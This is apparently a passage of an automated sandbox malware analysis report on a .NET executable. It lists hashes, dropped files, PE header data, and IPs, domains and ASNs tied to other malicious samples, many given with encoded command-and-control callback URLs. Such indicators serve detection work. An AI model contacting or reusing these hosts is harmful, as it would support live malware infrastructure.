                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  16:59:14API Interceptor1x Sleep call for process: bXFjrxjRlb.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  34.102.136.180xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                  • www.ricardoinman.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQV/txd+LHV0DSgDXQ==
                                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                                  • www.jikzo.com/c8so/?3ff87=Bcwq9mo1SLdxGMzaDRBSbVH3gidTK8xbNEF8M/tGLQ2aKWcuDQCQFtxR7k1oF3yRZXKc&uZWD=XPmPajepJ2gdvnZ
                                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                                  • www.simplifiedvirtualsolutions.com/oean/?MdLxlt=mKgmb7I6yODGcWmnOnDfCd0CfDEQGPBdVeZhKsaKMoR3Qh4v4CLN6oxN3p9trG3799qCow==&gnU4Pf=yZPLGZXHl
                                                  Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                  • www.kaiyuansu.pro/incn/?9r_PU=-ZQLEn&e2Jdlzf8=4y+UTKzAJ4dBlp/RYYS74WaP+qCjnKVRzK/jF/x906cXBmLcUo8gxmNUvdqUiR1QG2msPA==
                                                  winlog(1).exeGet hashmaliciousBrowse
                                                  • www.growingequity.fund/oean/?8pNhXv=yVML0zB0&u4XpH=VZAj6Grbo5w3dBd7w+9BSoe0Fg1VHX3dphJz9/egos9dVzX5qD6mqxE3tIZZ2ImCjS7epxmUBA==
                                                  win32.exeGet hashmaliciousBrowse
                                                  • www.findthatsmartphone.com/incn/?8pBP5p=/AA5bjKPiaWw22bzCdt7lqNbxAyyPpv3elVlM12b4Zuyr5w4xH0F6TIfefQNvJyZz9qG&L6Ah=2dSLFXghYtFd0
                                                  1-26.exeGet hashmaliciousBrowse
                                                  • www.catalogcardgames.net/bf3/?UXrxP8=0T3HW8l&URfXx=Sdh36sWiaQaHmuW5OuhNg2ZSKBobeXsq4DWTIDdmgtvI732RtscB8O3t4ssmBmGg4ghZ
                                                  Request.xlsxGet hashmaliciousBrowse
                                                  • www.cleverwares.com/c8so/?Rf=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==&LDHHp=z4D80PDX
                                                  INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                  • www.5050alberta.com/xle/?8pqhs=XuVPlIEgAAku+dXH+MR8cy20ZHkP0iJzlT7lKUj3PYBKa8v0bSmzSfHWFfmBCUSgIWFn2Q==&tDH=XRR8
                                                  RFQ.xlsxGet hashmaliciousBrowse
                                                  • www.blacknation.info/c8so/?pBU=HzuD_&gb24XB=6ATEh1s0NdZErsRPIUioXmvz20sSLCkN4f+QHjKAbluYenOJN9FSbPt8XJ2H+dMMf4Jp2Q==
                                                  New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                  • www.primeoneimplants.com/qjnt/?tB=TtdpPpppFvG&1bwhC=nh3Tl/oLs4HXZ5hiWyD3n36TA5+xQ+CwXb+KxfiJNOta6blp58Sj1H/LHtoCWuUTeWdwKg==
                                                  RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                  • www.harperandchloe.com/xle/?5jFlkJJh=FNtvxHF14RtgzuhKSaLd0lIzxL3LkdKZj/Q/Opos8UfLtbug0tkzhu0XdD0TouZ6I/qGUQ==&LR-T=vBK0GdQp
                                                  gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                  • www.ctfocbdwholesale.com/bw82/?W6=Rxta6xhtzzdBFDuy4SYKtO8XUaMinJcredo77YczPu8Lep1ecFiaWqXH8h2T5haNROfU&odeTY=cnxhAP6x
                                                  bgJPIZIYby.exeGet hashmaliciousBrowse
                                                  • www.engageautism.info/bw82/?GFND=n1L9MQk6NEQOasYlfxU4KXziLGivOllQbNtATfsC4RjAZctNbAJfQ2EIxV87fcKcU54A&Rlj=YVIX8Hyx
                                                  vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                  • www.brainandbodystrengthcoach.com/csv8/?Mjklsrcx=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwwlb5soGHyjF&Hp0xlh=EVvxc8
                                                  E4Q30tDEB9.exeGet hashmaliciousBrowse
                                                  • www.conanbiopharma.com/z9n/?GzuX=Jhwq104eoCBg19EU7i3a/UNFlUD6BU+epYAdz34/Q5fuIRMc24e0hydyrjaAvIdaUf1m&9rspoR=ffn0iZa81
                                                  INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                  • www.4thop.com/ur06/?2d=9rm4l4y&nt=yKWvtfxgXgd1h/cfVfwsL+vVHM9GHRLI6tHsLUWr1fII7HM154cThMJKgGXJGqB7HwFq
                                                  560911_P.EXEGet hashmaliciousBrowse
                                                  • www.leagueofwomengolfers.com/bf3/?2d=8pJhqv2&mt=Rg5SRlzVdqtJGgbKsvZ2Ay09186BQEC1kuNds6zR1M82qUcQWtSjBMIC0cP/+2kk9Xcq
                                                  RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                  • www.luxpropertyandassociates.com/nki/?-Z=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQkPQMY0RHvTE&rTILhT=X4XHRfqP
                                                  documents_0084568546754.exeGet hashmaliciousBrowse
                                                  • www.unlikelypolitician.com/hpg3/?GzuX=AgT4KauKKZQ2JUupBAGVU1xj9lzNj8Soa1/lSyFuPG4dLNFEFBMtgFS5ro8vw6+alj0G&AnB=O2Mxhrspi
                                                  68.183.162.131IMG_1107.EXEGet hashmaliciousBrowse
                                                  • www.thehostingroad.com/bf3/?DXOX-=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjh/9U9ktH10&KzuH=XPjDi0j0G
                                                  198.54.117.215RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                  • www.doggybargains.com/nki/?-Z=TOQH/B74eY+lLUBsPfn02/AyeWt7NTM3T5MQ11peB6QiRzS5xhI/XYvznkNG9/RZ90Wt&rTILhT=X4XHRfqP
                                                  yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                  • www.accessible.legal/csv8/?EHU40X=gbWtoXjpHB&Aro=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx9DJFvjgpGDVDlUe9g==
                                                  Project review_Pdf.exeGet hashmaliciousBrowse
                                                  • www.volemate.com/dll/?t81X=+rBDSeByYOuwiyCs2FmR2y2szzEgjgAAJgIvvmfJRMvBkX5MwbWWrzyN0ALTtAZKZ6lr&WPXhU=wBWHJtHHN
                                                  Banking Details Review_Pdf.exeGet hashmaliciousBrowse
                                                  • www.workonlinetimallen.com/dll/?FPWlH4K=22Ck7sZymRlue/F9el9iWIuDvjTWQNWCbFaq8o3IMCkjvmOJhGd/Odg920f9GQzD8gYG&Bl=sHdPVHypI2c
                                                  kqwqyoFz1C.exeGet hashmaliciousBrowse
                                                  • www.swavhca.com/jskg/?9roHn=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLDTuqn6wJ28t&npHhW=3fq4gDD0abs8
                                                  RFQ 00068643 New Order Shipment to Jebel Ali Port UAE.exeGet hashmaliciousBrowse
                                                  • www.alittlereward.com/x2ee/?8pGxKNk8=Vtb1/iiBU+uCF3AJeGCOPklMCv99vxzvnxKn5/cIaWE1JMwW91M+jgsTK6I+a0rF2zAW&DzudC=Bxo0src
                                                  3Y690n1UsS.exeGet hashmaliciousBrowse
                                                  • www.accessible.legal/csv8/?SR-D3jP=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx+vzGuPbqxiE&J0GTk=3fPL-xo0rXp0UNn
                                                  hlNvQKaRR3.exeGet hashmaliciousBrowse
                                                  • www.pnorg.net/jskg/?yN6Ddr1H=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&8p=2dOPB6nHz
                                                  AT113020.exeGet hashmaliciousBrowse
                                                  • www.thanksforlove.com/9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p
                                                  invoice No_SINI0068206497.exeGet hashmaliciousBrowse
                                                  • www.wholesalebrands.xyz/mkr/
                                                  PI210941.exeGet hashmaliciousBrowse
                                                  • www.teamchi.club/t4vo/?o2J=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDQDM5ezuEyU2&4h0=vZR8DbS8Z4yXah
                                                  NA_GRAPH.EXEGet hashmaliciousBrowse
                                                  • www.teamchi.club/t4vo/?lN64=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDQDmmuDuAwc2&8p=MTKP1hb
                                                  HussCrypted.exeGet hashmaliciousBrowse
                                                  • www.7dayscale.info/cia6/?JtxL=XPv4nNDh&DXFTE=xgSodjwNOpvqRBgSHkNiwEBg/WwFTBg6svwXL9igyoS1pHT72fkq2llttMIrDbkzmKwF7fpjCw==
                                                  M11sVPvWUT.exeGet hashmaliciousBrowse
                                                  • www.kurdishrealestateagents.com/ggb4/?p6A=VzUgzpiQkn30N256PBkiej7gQ1Kho/1eBKyywWWjmt2Ui9xM46LvrOITGrNcM7OxpBGx&oN9D=p4sXLLIPy2U4-N70
                                                  #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeGet hashmaliciousBrowse
                                                  • www.grandsonretail.com/5bs/?r0=AmztrAFPeyVzzS+3x4KThX9CMtZ1P8IrwIWrZYptpQCuj7ZPVnXcrmo/iPf97oeMmrlf&sZLdvf=8pQt_4k
                                                  AAPUR2-M.exeGet hashmaliciousBrowse
                                                  • www.passiontip.com/g456/?8pt0_NFP=PuON5O03Ksi8fY7rErP/3xSQ1dHRQax2yunXZCWMmHTE5PPAC5+YkNyA1Bevc9/c9Z1b&RZ=X2JpoVIXxdlT_B0
                                                  over.exeGet hashmaliciousBrowse
                                                  • www.exeteraesthetics.com/72w/
                                                  William Smith CV.docGet hashmaliciousBrowse
                                                  • www.fvqlkgedqjiqgapudkgq.com/post.php
                                                  Michael Smith Resume.xlsGet hashmaliciousBrowse
                                                  • www.march262020.site/post.php
                                                  William Smith Resume.xlsGet hashmaliciousBrowse
                                                  • www.march262020.site/post.php

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  parkingpage.namecheap.comwinlog(1).exeGet hashmaliciousBrowse
                                                  • 198.54.117.216
                                                  RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                  • 198.54.117.215
                                                  SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                  • 198.54.117.212
                                                  IMG_1107.EXEGet hashmaliciousBrowse
                                                  • 198.54.117.212
                                                  LOI.exeGet hashmaliciousBrowse
                                                  • 198.54.117.211
                                                  PO_610.20-21.A2424.UP_PDF.exeGet hashmaliciousBrowse
                                                  • 198.54.117.217
                                                  insz.exeGet hashmaliciousBrowse
                                                  • 198.54.117.218
                                                  Invoice Payment Details.exeGet hashmaliciousBrowse
                                                  • 198.54.117.218
                                                  Purchase order nr.0119-21.exeGet hashmaliciousBrowse
                                                  • 198.54.117.211
                                                  Request for Quotation.exeGet hashmaliciousBrowse
                                                  • 198.54.117.216
                                                  Bank details.exeGet hashmaliciousBrowse
                                                  • 198.54.117.212
                                                  yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                  • 198.54.117.215
                                                  ins.exeGet hashmaliciousBrowse
                                                  • 198.54.117.210
                                                  SHEXD2101127S_ShippingDocument_DkD.xlsxGet hashmaliciousBrowse
                                                  • 198.54.117.211
                                                  PI_JAN9071011998_BARYSLpdf.exeGet hashmaliciousBrowse
                                                  • 198.54.117.217
                                                  15012021.exeGet hashmaliciousBrowse
                                                  • 198.54.117.215
                                                  Inv.exeGet hashmaliciousBrowse
                                                  • 198.54.117.217
                                                  in.exeGet hashmaliciousBrowse
                                                  • 198.54.117.212
                                                  urgent specification request.exeGet hashmaliciousBrowse
                                                  • 198.54.117.210
                                                  g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                  • 198.54.117.210
                                                  www.getyoursofa.compo071.exeGet hashmaliciousBrowse
                                                  • 162.241.30.16

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  NAMECHEAP-NETUSDridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                  • 199.192.21.36
                                                  Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                  • 199.192.21.36
                                                  winlog(1).exeGet hashmaliciousBrowse
                                                  • 198.54.117.216
                                                  Revise Bank Details_pdf.exeGet hashmaliciousBrowse
                                                  • 198.54.116.236
                                                  SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
                                                  • 198.187.31.7
                                                  SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                  • 198.187.31.7
                                                  Payment Swift Copy_USD 206,832,000.00.pdf.exeGet hashmaliciousBrowse
                                                  • 198.54.116.236
                                                  INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                  • 198.54.117.244
                                                  DSksIiT85D.exeGet hashmaliciousBrowse
                                                  • 199.188.200.97
                                                  file.exeGet hashmaliciousBrowse
                                                  • 198.54.116.236
                                                  Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                  • 104.219.248.112
                                                  file.exeGet hashmaliciousBrowse
                                                  • 198.54.116.236
                                                  RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                  • 198.54.117.215
                                                  74725794.exeGet hashmaliciousBrowse
                                                  • 198.54.122.60
                                                  SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                  • 198.54.117.212
                                                  ACH Funds Transferred.xlsGet hashmaliciousBrowse
                                                  • 199.188.200.124
                                                  ACH Funds Transferred.xlsGet hashmaliciousBrowse
                                                  • 199.188.200.124
                                                  BENVAV31BU.htmlGet hashmaliciousBrowse
                                                  • 63.250.38.8
                                                  roK1cuvuLG.exeGet hashmaliciousBrowse
                                                  • 199.188.206.63
                                                  DHL Details.exeGet hashmaliciousBrowse
                                                  • 198.54.126.165
                                                  DIGITALOCEAN-ASNUSxDKOaCQQTQ.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  4bEUfowOcg.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  DAT.docGet hashmaliciousBrowse
                                                  • 167.71.148.58
                                                  ARCH_98_24301.docGet hashmaliciousBrowse
                                                  • 138.68.42.38
                                                  Bestellung.docGet hashmaliciousBrowse
                                                  • 157.245.145.87
                                                  RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                  • 178.62.115.183
                                                  vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                  • 107.170.138.56
                                                  SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Artemis5EFC4C46397A.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Artemis8353855AD729.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Generic.mg.b817172e5515b1af.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.ArtemisAA8578417627.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Artemis58690C2E2BCA.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Artemis961F6F63FB8F.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Generic.mg.11330b175b08895e.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  SecuriteInfo.com.Generic.mg.284f325559f6aab1.dllGet hashmaliciousBrowse
                                                  • 159.89.91.92
                                                  GOOGLEUSxl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  eEXZHxdxFE.exeGet hashmaliciousBrowse
                                                  • 35.228.108.144
                                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  o3Z5sgjhEM.exeGet hashmaliciousBrowse
                                                  • 35.186.223.98
                                                  ltf94qhZ37.exeGet hashmaliciousBrowse
                                                  • 35.228.108.144
                                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  winlog(1).exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  win32.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  DAT.docGet hashmaliciousBrowse
                                                  • 35.200.206.198
                                                  Bestellung.docGet hashmaliciousBrowse
                                                  • 172.217.6.174
                                                  .01.2021a.jsGet hashmaliciousBrowse
                                                  • 35.228.108.144
                                                  QT21006189.exeGet hashmaliciousBrowse
                                                  • 108.177.119.109
                                                  1-26.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  Request.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  RFQ.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                  • 34.102.136.180
                                                  gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                  • 34.102.136.180

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  C:\Users\user\AppData\Local\Temp\AddInProcess32.exeGenerator.cont.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      560911_P.EXEGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          IMG_61779.pdf.exeGet hashmaliciousBrowse
                                                            IMG_5391.EXEGet hashmaliciousBrowse
                                                              czZ769nM6r.exeGet hashmaliciousBrowse
                                                                IMG_1107.EXEGet hashmaliciousBrowse
                                                                  r3q6Bv8naR.exeGet hashmaliciousBrowse
                                                                    sy1RnlHl8Y.exeGet hashmaliciousBrowse
                                                                      qyMlTIBawC.exeGet hashmaliciousBrowse
                                                                        Qn2AQrgfqJ.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Trojan.PackedNET.509.28611.exeGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Trojan.PackedNET.509.17348.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Trojan.PackedNET.509.7497.exeGet hashmaliciousBrowse
                                                                                IMG_12283.exeGet hashmaliciousBrowse
                                                                                  IMG_06176.pdf.exeGet hashmaliciousBrowse
                                                                                    IMG_50617.pdf.exeGet hashmaliciousBrowse
                                                                                      IMG_06177.pdf.exeGet hashmaliciousBrowse
                                                                                        Order_List_PO# 081929.exeGet hashmaliciousBrowse

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bXFjrxjRlb.exe.log
                                                                                          Process:C:\Users\user\Desktop\bXFjrxjRlb.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1873
                                                                                          Entropy (8bit):5.355036985457214
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovitHoxHhAHKzvr1qHj:iqXeqm00YqhQnouRqjoKtIxHeqzTwD
                                                                                          MD5:CDA95282F22F47DA2FDDC9E912B67FEF
                                                                                          SHA1:67A40582A092B5DF40C3EB61A361A2D336FC69E0
                                                                                          SHA-256:179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
                                                                                          SHA-512:1D151D92AE982D2149C2255826C2FFB89A475A1EB9B9FE93DC3706F3016CD6B309743B36A4D7F6D68F48CE25391FDA7A2BAE42061535EEA7862460424A3A2036
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                          Process:C:\Users\user\Desktop\bXFjrxjRlb.exe
                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):42080
                                                                                          Entropy (8bit):6.2125074198825105
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                          MD5:F2A47587431C466535F3C3D3427724BE
                                                                                          SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                          SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                          SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: Generator.cont.exe, Detection: malicious, Browse
                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                          • Filename: 560911_P.EXE, Detection: malicious, Browse
                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_61779.pdf.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_5391.EXE, Detection: malicious, Browse
                                                                                          • Filename: czZ769nM6r.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_1107.EXE, Detection: malicious, Browse
                                                                                          • Filename: r3q6Bv8naR.exe, Detection: malicious, Browse
                                                                                          • Filename: sy1RnlHl8Y.exe, Detection: malicious, Browse
                                                                                          • Filename: qyMlTIBawC.exe, Detection: malicious, Browse
                                                                                          • Filename: Qn2AQrgfqJ.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Trojan.PackedNET.509.28611.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Trojan.PackedNET.509.17348.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Trojan.PackedNET.509.7497.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_12283.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_06176.pdf.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_50617.pdf.exe, Detection: malicious, Browse
                                                                                          • Filename: IMG_06177.pdf.exe, Detection: malicious, Browse
                                                                                          • Filename: Order_List_PO# 081929.exe, Detection: malicious, Browse
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):5.620907239788479
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:bXFjrxjRlb.exe
                                                                                          File size:772608
                                                                                          MD5:4a595c5540f0a097a5f11159cdf5c015
                                                                                          SHA1:9bd00bf1ffbdf53c841cd8d8b0a4244fdb7ba583
                                                                                          SHA256:d6c54588834faae60153c6a2e7318a7e9f243b9dbfbd6e0fc44d45f4d55c9fcf
                                                                                          SHA512:5d00dca3ca2b9cf7e381576ac61d9dcd9166529f4a77b9b196962b295ced4af5d372af8aa351da6aef9d3fdbd897f0e1273799601f6429e5069ce826ecdff1d2
                                                                                          SSDEEP:12288:Axu4lHfNbxp4FiDROtGr4eYNriW4/zxPZVCq6r8FSl:Axu4H/4RtRe2+TVCq6r8FS
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..^.................~...J........... ........@.. ....................... ............`................................

                                                                                          File Icon

                                                                                          Icon Hash:aaacae8e96a2c0e6

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4b9cfe
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                          Time Stamp:0x5E2E884B [Mon Jan 27 06:50:51 2020 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
